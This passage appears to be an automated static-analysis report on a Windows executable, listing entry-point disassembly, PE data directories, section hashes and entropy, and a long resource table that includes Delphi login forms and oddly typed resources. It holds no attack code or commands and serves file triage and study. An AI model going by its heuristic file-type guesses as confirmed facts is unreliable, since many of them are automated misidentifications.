                                                                                                                      cmp ecx, 02h
                                                                                                                      je 00007F747CDEC2DEh
                                                                                                                      or esi, 00008000h
                                                                                                                      mov dword ptr [00480958h], esi
                                                                                                                      shl eax, 08h
                                                                                                                      add eax, edx
                                                                                                                      mov dword ptr [0048095Ch], eax
                                                                                                                      xor esi, esi
                                                                                                                      push esi
                                                                                                                      mov edi, dword ptr [00446338h]
                                                                                                                      call 00007F747CDEDAEFh
                                                                                                                      dec ebp
                                                                                                                      pop edx
                                                                                                                      jne 00007F747CDEC2F1h
                                                                                                                      mov ecx, dword ptr [eax+3Ch]
                                                                                                                      add ecx, eax
                                                                                                                      cmp dword ptr [ecx], 00004550h
                                                                                                                      jne 00007F747CDEC2E4h
                                                                                                                      movzx eax, word ptr [ecx+18h]
                                                                                                                      cmp eax, 0000010Bh
                                                                                                                      je 00007F747CDEC2F1h
                                                                                                                      cmp eax, 0000020Bh
                                                                                                                      je 00007F747CDEC2D7h
                                                                                                                      mov dword ptr [ebp-1Ch], esi
                                                                                                                      jmp 00007F747CDEC2F9h
                                                                                                                      cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                      jbe 00007F747CDEC2C4h
                                                                                                                      xor eax, eax
                                                                                                                      cmp dword ptr [ecx+000000F8h], esi
                                                                                                                      jmp 00007F747CDEC2E0h
                                                                                                                      cmp dword ptr [ecx+74h], 0Eh
                                                                                                                      jbe 00007F747CDEC2B4h
                                                                                                                      xor eax, eax
                                                                                                                      cmp dword ptr [ecx+000000E8h], esi
                                                                                                                      setne al
                                                                                                                      mov dword ptr [ebp-1Ch], eax
                                                                                                                      Programming Language:
                                                                                                                      • [ASM] VS2003 (.NET) build 3077
                                                                                                                      • [ C ] VS2003 (.NET) build 3077
                                                                                                                      • [C++] VS2003 (.NET) build 3077
                                                                                                                      • [RES] VS2003 (.NET) build 3077
                                                                                                                      • [LNK] VS2003 (.NET) build 3077
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x51b74 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x83000 | 0x223dd8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x46600 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4ec80 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x46000 | 0x5f4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x443a4 | 0x45000 | 90bf5d6a9311d62e912522c28783a859 | False | 0.5500629812047102 | data | 6.578965194074808 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x46000 | 0xdc08 | 0xe000 | f035081ac4c7ee86cd6ead176dd1c9bb | False | 0.3834228515625 | data | 5.2366811213048665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x54000 | 0x2e294 | 0x4000 | 8313c86e1a2ce269f3aa390bb3074e9b | False | 0.2427978515625 | data | 2.963596560441913 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x83000 | 0x223dd8 | 0x224000 | 59bade16f1d8419fc75dee42e8a1822f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x86440 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x86574 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_CURSOR | 0x86628 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365
RT_CURSOR | 0x8675c | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715
RT_CURSOR | 0x86890 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x869c4 | 0x134 | data | English | United States | 0.37662337662337664
RT_CURSOR | 0x86af8 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x86c2c | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664
RT_CURSOR | 0x86d60 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x86e94 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x86fc8 | 0x134 | data | English | United States | 0.44155844155844154
RT_CURSOR | 0x870fc | 0x134 | data | English | United States | 0.4155844155844156
RT_CURSOR | 0x87230 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922
RT_CURSOR | 0x87364 | 0x134 | data | English | United States | 0.2662337662337662
RT_CURSOR | 0x87498 | 0x134 | data | English | United States | 0.2824675324675325
RT_CURSOR | 0x875cc | 0x134 | data | English | United States | 0.3246753246753247
RT_BITMAP | 0x87700 | 0x2e02a | Device independent bitmap graphic, 1472 x 32 x 32, image size 188418, resolution 2834 x 2834 px/m | | | 0.2016895011090004
RT_BITMAP | 0xb572c | 0x42a | Device independent bitmap graphic, 16 x 16 x 32, image size 1026, resolution 2834 x 2834 px/m | | | 0.8236397748592871
RT_BITMAP | 0xb5b58 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | | | 0.5701219512195121
RT_BITMAP | 0xb61c0 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0xb6278 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
                                                                                                                      RT_ICON0xb63bc0x44028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.2371665087160047
                                                                                                                      RT_ICON0xfa3e40x45aeaPC bitmap, Windows 3.x format, 36002 x 2 x 37, image size 285759, cbSize 285418, bits offset 540.9950668843590804
                                                                                                                      RT_ICON0x13fed00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishUnited States0.42567567567567566
                                                                                                                      RT_ICON0x13fff80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colorsEnglishUnited States0.260752688172043
                                                                                                                      RT_MENU0x1402e00xe6dataEnglishUnited States0.6304347826086957
                                                                                                                      RT_DIALOG0x1403c80x134dataEnglishUnited States0.5844155844155844
                                                                                                                      RT_DIALOG0x1404fc0xe8dataEnglishUnited States0.6336206896551724
                                                                                                                      RT_STRING0x1405e40x378dataChineseTaiwan0.49436936936936937
                                                                                                                      RT_STRING0x14095c0x896dataCzechCzech Republic0.29754322111010006
                                                                                                                      RT_STRING0x1411f40x914dataDanishDenmark0.2706540447504303
                                                                                                                      RT_STRING0x141b080x9ecdataGermanGermany0.27244094488188975
                                                                                                                      RT_STRING0x1424f40xa74dataGreekGreece0.2705530642750374
                                                                                                                      RT_STRING0x142f680x922dataFinnishFinland0.2523524379811805
                                                                                                                      RT_STRING0x14388c0x95edataFrenchFrance0.25312760633861553
                                                                                                                      RT_STRING0x1441ec0x68adataHebrewIsrael0.3279569892473118
                                                                                                                      RT_STRING0x1448780x8e0dataHungarianHungary0.2953345070422535
                                                                                                                      RT_STRING0x1451580x8e4dataItalianItaly0.2627416520210896
                                                                                                                      RT_STRING0x145a3c0x550dataJapaneseJapan0.35294117647058826
                                                                                                                      RT_STRING0x145f8c0x55cdataKoreanNorth Korea0.39941690962099125
                                                                                                                      RT_STRING0x145f8c0x55cdataKoreanSouth Korea0.39941690962099125
                                                                                                                      RT_STRING0x1464e80x8e6dataDutchNetherlands0.26733977172958734
                                                                                                                      RT_STRING0x146dd00x82adataNorwegianNorway0.26842105263157895
                                                                                                                      RT_STRING0x1475fc0x7eedataPolishPoland0.28374384236453204
                                                                                                                      RT_STRING0x147dec0xa12dataPortugueseBrazil0.24204809930178434
                                                                                                                      RT_STRING0x1488000x7badataRussianRussia0.327098078867543
                                                                                                                      RT_STRING0x148fbc0x8fcdataSwedishSweden0.25478260869565217
                                                                                                                      RT_STRING0x1498b80x7e8dataThaiThailand0.3102766798418972
                                                                                                                      RT_STRING0x14a0a00x3f6dataChineseChina0.48520710059171596
                                                                                                                      RT_STRING0x14a4980x954dataPortuguesePortugal0.26256281407035176
                                                                                                                      RT_STRING0x14adec0x8f2data0.251528384279476
                                                                                                                      RT_STRING0x14b6e00x8fadataEnglishCanada0.24412532637075718
                                                                                                                      RT_STRING0x14bfdc0x21cdataChineseTaiwan0.6444444444444445
                                                                                                                      RT_STRING0x14c1f80x3eadataCzechCzech Republic0.4431137724550898
                                                                                                                      RT_STRING0x14c5e40x41edataDanishDenmark0.3984819734345351
                                                                                                                      RT_STRING0x14ca040x512AmigaOS bitmap font "o", fc_YSize 25344, 17920 elements, 2nd " ", 3rd "e"GermanGermany0.362095531587057
                                                                                                                      RT_STRING0x14cf180x482dataGreekGreece0.44280762564991333
                                                                                                                      RT_STRING0x14d39c0x504dataFinnishFinland0.3598130841121495
                                                                                                                      RT_STRING0x14d8a00x4b6dataFrenchFrance0.3548922056384743
                                                                                                                      RT_STRING0x14dd580x384dataHebrewIsrael0.4588888888888889
                                                                                                                      RT_STRING0x14e0dc0x466dataHungarianHungary0.42362344582593253
                                                                                                                      RT_STRING0x14e5440x43cdataItalianItaly0.3966789667896679
                                                                                                                      RT_STRING0x14e9800x22edataJapaneseJapan0.6164874551971327
                                                                                                                      RT_STRING0x14ebb00x240dataKoreanNorth Korea0.6388888888888888
                                                                                                                      RT_STRING0x14ebb00x240dataKoreanSouth Korea0.6388888888888888
                                                                                                                      RT_STRING0x14edf00x4e2dataDutchNetherlands0.3424
                                                                                                                      RT_STRING0x14f2d40x3e0AmigaOS bitmap font "v", fc_YSize 28416, 16640 elements, 2nd "i", 3rd "e"NorwegianNorway0.4112903225806452
                                                                                                                      RT_STRING0x14f6b40x4acdataPolishPoland0.4080267558528428
                                                                                                                      RT_STRING0x14fb600x4b0dataPortugueseBrazil0.3858333333333333
                                                                                                                      RT_STRING0x1500100x5c8dataRussianRussia0.36824324324324326
                                                                                                                      RT_STRING0x1505d80x41edataSwedishSweden0.3776091081593928
                                                                                                                      RT_STRING0x1509f80x362dataThaiThailand0.46882217090069284
                                                                                                                      RT_STRING0x150d5c0x1eadataChineseChina0.7306122448979592
                                                                                                                      RT_STRING0x150f480x4a6dataPortuguesePortugal0.3815126050420168
                                                                                                                      RT_STRING0x1513f00x4ecAmigaOS bitmap font "s", fc_YSize 24832, 21760 elements, 2nd "c", 3rd "q"0.3753968253968254
                                                                                                                      RT_STRING0x1518dc0x3b0dataEnglishCanada0.4014830508474576
                                                                                                                      RT_STRING0x151c8c0x2c8dataChineseTaiwan0.7780898876404494
                                                                                                                      RT_STRING0x151f540x6c2dataCzechCzech Republic0.4028901734104046
                                                                                                                      RT_STRING0x1526180x7ecdataDanishDenmark0.35552268244575935
                                                                                                                      RT_STRING0x152e040x8c8dataGermanGermany0.33629893238434166
                                                                                                                      RT_STRING0x1536cc0x926AmigaOS bitmap font "\301\003\255\003\307\003\277\003\275\003 ", fc_YSize 4294948611, 41987 elementsGreekGreece0.3736122971818958
                                                                                                                      RT_STRING0x153ff40x6a8dataFinnishFinland0.3826291079812207
                                                                                                                      RT_STRING0x15469c0x818dataFrenchFrance0.3359073359073359
                                                                                                                      RT_STRING0x154eb40x6e0dataHebrewIsrael0.38238636363636364
                                                                                                                      RT_STRING0x1555940x750AmigaOS bitmap font "k", fc_YSize 11520, 16640 elements, 2nd " ", 3rd "l"HungarianHungary0.38514957264957267
                                                                                                                      RT_STRING0x155ce40x7b6dataItalianItaly0.34903748733535966
                                                                                                                      RT_STRING0x15649c0x3e4dataJapaneseJapan0.5783132530120482
                                                                                                                      RT_STRING0x1568800x44cdataKoreanNorth Korea0.5636363636363636
                                                                                                                      RT_STRING0x1568800x44cdataKoreanSouth Korea0.5636363636363636
                                                                                                                      RT_STRING0x156ccc0x820dataDutchNetherlands0.33557692307692305
                                                                                                                      RT_STRING0x1574ec0x742AmigaOS bitmap font "j", fc_YSize 30208, 18176 elements, 2nd "r", 3rd "e"NorwegianNorway0.34607104413347684
                                                                                                                      RT_STRING0x157c300x728dataPolishPoland0.384825327510917
                                                                                                                      RT_STRING0x1583580x84cdataPortugueseBrazil0.3422787193973635
                                                                                                                      RT_STRING0x158ba40x6f2dataRussianRussia0.3914510686164229
                                                                                                                      RT_STRING0x1592980x7b6AmigaOS bitmap font "u", fc_YSize 8192, 19968 elements, 2nd "v", 3rd "e"SwedishSweden0.3601823708206687
                                                                                                                      RT_STRING0x159a500x658dataThaiThailand0.42549261083743845
                                                                                                                      RT_STRING0x15a0a80x2e0dataChineseChina0.751358695652174
                                                                                                                      RT_STRING0x15a3880x770dataPortuguesePortugal0.34558823529411764
                                                                                                                      RT_STRING0x15aaf80x7b0AmigaOS bitmap font "r", fc_YSize 25856, 16640 elements, 2nd "D", 3rd "e"0.3475609756097561
                                                                                                                      RT_STRING0x15b2a80x7b6dataEnglishCanada0.3454913880445795
                                                                                                                      RT_STRING0x15ba600x2d6dataChineseTaiwan0.7851239669421488
                                                                                                                      RT_STRING0x15bd380x64adataCzechCzech Republic0.45217391304347826
                                                                                                                      RT_STRING0x15c3840x66cdataDanishDenmark0.40450121654501214
                                                                                                                      RT_STRING0x15c9f00x6e0Dyalog APL aplcore version 66.0GermanGermany0.4017045454545455
                                                                                                                      RT_STRING0x15d0d00x718OpenPGP Secret KeyGreekGreece0.43061674008810574
                                                                                                                      RT_STRING0x15d7e80x63edataFinnishFinland0.4123904881101377
                                                                                                                      RT_STRING0x15de280x65edataFrenchFrance0.4147239263803681
                                                                                                                      RT_STRING0x15e4880x5c4dataHebrewIsrael0.45799457994579945
                                                                                                                      RT_STRING0x15ea4c0x5b0dataHungarianHungary0.45879120879120877
                                                                                                                      RT_STRING0x15effc0x67cdataItalianItaly0.41566265060240964
                                                                                                                      RT_STRING0x15f6780x36adataJapaneseJapan0.6601830663615561
                                                                                                                      RT_STRING0x15f9e40x380dataKoreanNorth Korea0.6662946428571429
                                                                                                                      RT_STRING0x15f9e40x380dataKoreanSouth Korea0.6662946428571429
                                                                                                                      RT_STRING0x15fd640x6c0dataDutchNetherlands0.3894675925925926
                                                                                                                      RT_STRING0x1604240x63adataNorwegianNorway0.397741530740276
                                                                                                                      RT_STRING0x160a600x5d0dataPolishPoland0.4536290322580645
                                                                                                                      RT_STRING0x1610300x66adataPortugueseBrazil0.4287454323995128
                                                                                                                      RT_STRING0x16169c0x550dataRussianRussia0.4625
                                                                                                                      RT_STRING0x161bec0x60edataSwedishSweden0.4096774193548387
                                                                                                                      RT_STRING0x1621fc0x500dataThaiThailand0.5046875
                                                                                                                      RT_STRING0x1626fc0x2c8dataChineseChina0.827247191011236
                                                                                                                      RT_STRING0x1629c40x608OpenPGP Secret KeyPortuguesePortugal0.4216321243523316
                                                                                                                      RT_STRING0x162fcc0x664OpenPGP Secret Key0.41503667481662593
                                                                                                                      RT_STRING0x1636300x5daDOS executable (COM, 0x8C-variant)EnglishCanada0.4205607476635514
                                                                                                                      RT_STRING0x163c0c0x340AmigaOS bitmap font "~v.zMQ\273\214\013N\011\217\204v", fc_YSize 8192, 2638 elements, 2nd "-\212\356v\004\223\014", 3rd "d"ChineseTaiwan0.6358173076923077
                                                                                                                      RT_STRING0x163f4c0x6f8dataCzechCzech Republic0.36154708520179374
                                                                                                                      RT_STRING0x1646440x74cdataDanishDenmark0.3329764453961456
                                                                                                                      RT_STRING0x164d900x802dataGermanGermany0.3326829268292683
                                                                                                                      RT_STRING0x1655940x908dataGreekGreece0.3672145328719723
                                                                                                                      RT_STRING0x165e9c0x77edataFinnishFinland0.35662148070907196
                                                                                                                      RT_STRING0x16661c0x842dataFrenchFrance0.33349101229895933
                                                                                                                      RT_STRING0x166e600x626dataHebrewIsrael0.40088945362134687
                                                                                                                      RT_STRING0x1674880x72adataHungarianHungary0.36150490730643403
                                                                                                                      RT_STRING0x167bb40x7b8dataItalianItaly0.3350202429149798
                                                                                                                      RT_STRING0x16836c0x456dataJapaneseJapan0.4846846846846847
                                                                                                                      RT_STRING0x1687c40x45adataKoreanNorth Korea0.5197486535008977
                                                                                                                      RT_STRING0x1687c40x45adataKoreanSouth Korea0.5197486535008977
                                                                                                                      RT_STRING0x168c200x7cedataDutchNetherlands0.3308308308308308
                                                                                                                      RT_STRING0x1693f00x7a6dataNorwegianNorway0.3202247191011236
                                                                                                                      RT_STRING0x169b980x698dataPolishPoland0.36729857819905215
                                                                                                                      RT_STRING0x16a2300x85cdataPortugueseBrazil0.31822429906542055
                                                                                                                      RT_STRING0x16aa8c0x6b0dataRussianRussia0.3679906542056075
                                                                                                                      RT_STRING0x16b13c0x6dedataSwedishSweden0.34186575654152446
                                                                                                                      RT_STRING0x16b81c0x636dataThaiThailand0.3855345911949686
                                                                                                                      RT_STRING0x16be540x346dataChineseChina0.636038186157518
                                                                                                                      RT_STRING0x16c19c0x7dedataPortuguesePortugal0.32621648460774577
                                                                                                                      RT_STRING0x16c97c0x73cdata0.3250539956803456
                                                                                                                      RT_STRING0x16d0b80x74cdataEnglishCanada0.3217344753747323
                                                                                                                      RT_STRING0x16d8040x46edataChineseTaiwan0.599647266313933
                                                                                                                      RT_STRING0x16dc740x7b8dataCzechCzech Republic0.4185222672064777
                                                                                                                      RT_STRING0x16e42c0x82adataDanishDenmark0.3736842105263158
                                                                                                                      RT_STRING0x16ec580x868dataGermanGermany0.3712825278810409
                                                                                                                      RT_STRING0x16f4c00x966dataGreekGreece0.39276807980049877
                                                                                                                      RT_STRING0x16fe280x954dataFinnishFinland0.36139028475711893
                                                                                                                      RT_STRING0x17077c0x94cPDP-11 demand-paged pure executable not strippedFrenchFrance0.36512605042016805
                                                                                                                      RT_STRING0x1710c80x728dataHebrewIsrael0.4170305676855895
                                                                                                                      RT_STRING0x1717f00x7f8dataHungarianHungary0.3877450980392157
                                                                                                                      RT_STRING0x171fe80x86adataItalianItaly0.37418755803156917
                                                                                                                      RT_STRING0x1728540x53edataJapaneseJapan0.5104321907600596
                                                                                                                      RT_STRING0x172d940x5aedataKoreanNorth Korea0.5281980742778541
                                                                                                                      RT_STRING0x172d940x5aedataKoreanSouth Korea0.5281980742778541
                                                                                                                      RT_STRING0x1733440x878dataDutchNetherlands0.3519372693726937
                                                                                                                      RT_STRING0x173bbc0x7a4dataNorwegianNorway0.37678936605316976
                                                                                                                      RT_STRING0x1743600x85adataPolishPoland0.3985032740879326
                                                                                                                      RT_STRING0x174bbc0x8eedataPortugueseBrazil0.36832895888014
                                                                                                                      RT_STRING0x1754ac0x83adataRussianRussia0.4107312440645774
                                                                                                                      RT_STRING0x175ce80x7fadataSwedishSweden0.38050930460333005
                                                                                                                      RT_STRING0x1764e40x738dataThaiThailand0.42045454545454547
                                                                                                                      RT_STRING0x176c1c0x482dataChineseChina0.6091854419410745
                                                                                                                      RT_STRING0x1770a00x81adataPortuguesePortugal0.3799421407907425
                                                                                                                      RT_STRING0x1778bc0x858data0.38436329588014984
                                                                                                                      RT_STRING0x1781140x7badataEnglishCanada0.3822042467138524
                                                                                                                      RT_STRING0x18e0a80x46dataPortugueseBrazil0.7428571428571429
                                                                                                                      RT_STRING0x18e0f00x46dataRussianRussia0.7428571428571429
                                                                                                                      RT_STRING0x18e1380x46dataSwedishSweden0.7428571428571429
                                                                                                                      RT_STRING0x18e1800x46dataThaiThailand0.7428571428571429
                                                                                                                      RT_STRING0x18e1c80x46dataChineseChina0.7428571428571429
                                                                                                                      RT_STRING0x18e2100x46dataPortuguesePortugal0.7428571428571429
                                                                                                                      RT_STRING0x18e2580x46data0.7428571428571429
                                                                                                                      RT_STRING0x18e2a00x46dataEnglishCanada0.7428571428571429
RT_STRING | 0x18e2e8 | 0x1f8 | data | Chinese | Taiwan | 0.36706349206349204
RT_STRING | 0x18e4e0 | 0x1f8 | data | Czech | Czech Republic | 0.36706349206349204
RT_STRING | 0x18e6d8 | 0x1f8 | data | Danish | Denmark | 0.36706349206349204
RT_STRING | 0x18e8d0 | 0x1f8 | data | German | Germany | 0.36706349206349204
RT_STRING | 0x18eac8 | 0x1f8 | data | Greek | Greece | 0.36706349206349204
RT_STRING | 0x18ecc0 | 0x1f8 | data | Finnish | Finland | 0.36706349206349204
RT_STRING | 0x18eeb8 | 0x1f8 | data | French | France | 0.36706349206349204
RT_STRING | 0x18f0b0 | 0x1f8 | data | Hebrew | Israel | 0.36706349206349204
RT_STRING | 0x18f2a8 | 0x1f8 | data | Hungarian | Hungary | 0.36706349206349204
RT_STRING | 0x18f4a0 | 0x1f8 | data | Italian | Italy | 0.36706349206349204
RT_STRING | 0x18f698 | 0x1f8 | data | Japanese | Japan | 0.36706349206349204
RT_STRING | 0x18f890 | 0x1f8 | data | Korean | North Korea | 0.36706349206349204
RT_STRING | 0x18f890 | 0x1f8 | data | Korean | South Korea | 0.36706349206349204
RT_STRING | 0x18fa88 | 0x1f8 | data | Dutch | Netherlands | 0.36706349206349204
RT_STRING | 0x18fc80 | 0x1f8 | data | Norwegian | Norway | 0.36706349206349204
RT_STRING | 0x18fe78 | 0x1f8 | data | Polish | Poland | 0.36706349206349204
RT_STRING | 0x190070 | 0x1f8 | data | Portuguese | Brazil | 0.36706349206349204
RT_STRING | 0x190268 | 0x1f8 | data | Russian | Russia | 0.36706349206349204
RT_STRING | 0x190460 | 0x1f8 | data | Swedish | Sweden | 0.36706349206349204
RT_STRING | 0x190658 | 0x1f8 | data | Thai | Thailand | 0.36706349206349204
RT_STRING | 0x190850 | 0x1f8 | data | Chinese | China | 0.36706349206349204
RT_STRING | 0x190a48 | 0x1f8 | data | Portuguese | Portugal | 0.36706349206349204
RT_STRING | 0x190c40 | 0x1f8 | data |  |  | 0.36706349206349204
RT_STRING | 0x190e38 | 0x1f8 | data | English | Canada | 0.36706349206349204
RT_STRING | 0x191030 | 0x86 | data | Chinese | Taiwan | 0.6567164179104478
RT_STRING | 0x1910b8 | 0x86 | data | Czech | Czech Republic | 0.6567164179104478
RT_STRING | 0x191140 | 0x86 | data | Danish | Denmark | 0.6567164179104478
RT_STRING | 0x1911c8 | 0x86 | data | German | Germany | 0.6567164179104478
RT_STRING | 0x191250 | 0x86 | data | Greek | Greece | 0.6567164179104478
RT_STRING | 0x1912d8 | 0x86 | data | Finnish | Finland | 0.6567164179104478
RT_STRING | 0x191360 | 0x86 | data | French | France | 0.6567164179104478
RT_STRING | 0x1913e8 | 0x86 | data | Hebrew | Israel | 0.6567164179104478
RT_STRING | 0x191470 | 0x86 | data | Hungarian | Hungary | 0.6567164179104478
RT_STRING | 0x1914f8 | 0x86 | data | Italian | Italy | 0.6567164179104478
RT_STRING | 0x191580 | 0x86 | data | Japanese | Japan | 0.6567164179104478
RT_STRING | 0x191608 | 0x86 | data | Korean | North Korea | 0.6567164179104478
RT_STRING | 0x191608 | 0x86 | data | Korean | South Korea | 0.6567164179104478
RT_STRING | 0x191690 | 0x86 | data | Dutch | Netherlands | 0.6567164179104478
RT_STRING | 0x191718 | 0x86 | data | Norwegian | Norway | 0.6567164179104478
RT_STRING | 0x1917a0 | 0x86 | data | Polish | Poland | 0.6567164179104478
RT_STRING | 0x191828 | 0x86 | data | Portuguese | Brazil | 0.6567164179104478
RT_STRING | 0x1918b0 | 0x86 | data | Russian | Russia | 0.6567164179104478
RT_STRING | 0x191938 | 0x86 | data | Swedish | Sweden | 0.6567164179104478
RT_STRING | 0x1919c0 | 0x86 | data | Thai | Thailand | 0.6567164179104478
RT_STRING | 0x191a48 | 0x86 | data | Chinese | China | 0.6567164179104478
RT_STRING | 0x191ad0 | 0x86 | data | Portuguese | Portugal | 0.6567164179104478
RT_STRING | 0x191b58 | 0x86 | data |  |  | 0.6567164179104478
RT_STRING | 0x191be0 | 0x86 | data | English | Canada | 0.6567164179104478
RT_STRING | 0x191c68 | 0x82 | StarOffice Gallery theme p, 536899072 objects, 1st n | English | United States | 0.7153846153846154
RT_STRING | 0x191cec | 0x2a | data | English | United States | 0.5476190476190477
RT_STRING | 0x191d18 | 0x192 | data | English | United States | 0.48009950248756217
RT_STRING | 0x191eac | 0x4e2 | data | English | United States | 0.376
RT_STRING | 0x192390 | 0x31a | data | English | United States | 0.2682619647355164
RT_STRING | 0x1926ac | 0x2dc | data | English | United States | 0.36885245901639346
RT_STRING | 0x192988 | 0x8a | data | English | United States | 0.6594202898550725
RT_STRING | 0x192a14 | 0xac | data | English | United States | 0.45348837209302323
RT_STRING | 0x192ac0 | 0xde | data | English | United States | 0.536036036036036
RT_STRING | 0x192ba0 | 0x4c4 | data | English | United States | 0.3221311475409836
RT_STRING | 0x193064 | 0x264 | data | English | United States | 0.3741830065359477
RT_STRING | 0x1932c8 | 0x2c | data | English | United States | 0.5227272727272727
RT_STRING | 0x1932f4 | 0x42 | data | English | United States | 0.6060606060606061
RT_ACCELERATOR | 0x193338 | 0x50 | data | English | United States | 0.8
RT_RCDATA | 0x193388 | 0x9c27a | Delphi compiled form 'TdmMain' |  |  | 0.3199121339566298
RT_RCDATA | 0x22f604 | 0x23e27 | Delphi compiled form 'TfLogin' |  |  | 0.2975582210187573
RT_MESSAGETABLE | 0x25342c | 0x2840 | data |  |  | 0.4204192546583851
RT_MESSAGETABLE | 0x255c6c | 0x2840 | data |  |  | 0.3144409937888199
RT_GROUP_CURSOR | 0x2584ac | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States | 1.0294117647058822
RT_GROUP_CURSOR | 0x2584d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2584e4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2584f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x25850c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x258520 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x258534 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x258548 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x25855c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x258570 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x258584 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x258598 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2585ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2585c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2585d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x2585e8 | 0x22 | data | English | United States | 1.0
RT_VERSION | 0x25860c | 0x32c | data | English | United States | 0.4248768472906404
RT_ANIICON | 0x258938 | 0x4e4a0 | PC bitmap, Windows 3.x format, 40938 x 2 x 38, image size 320770, cbSize 320672, bits offset 54 |  |  | 0.9413013920766391
DLL | Import
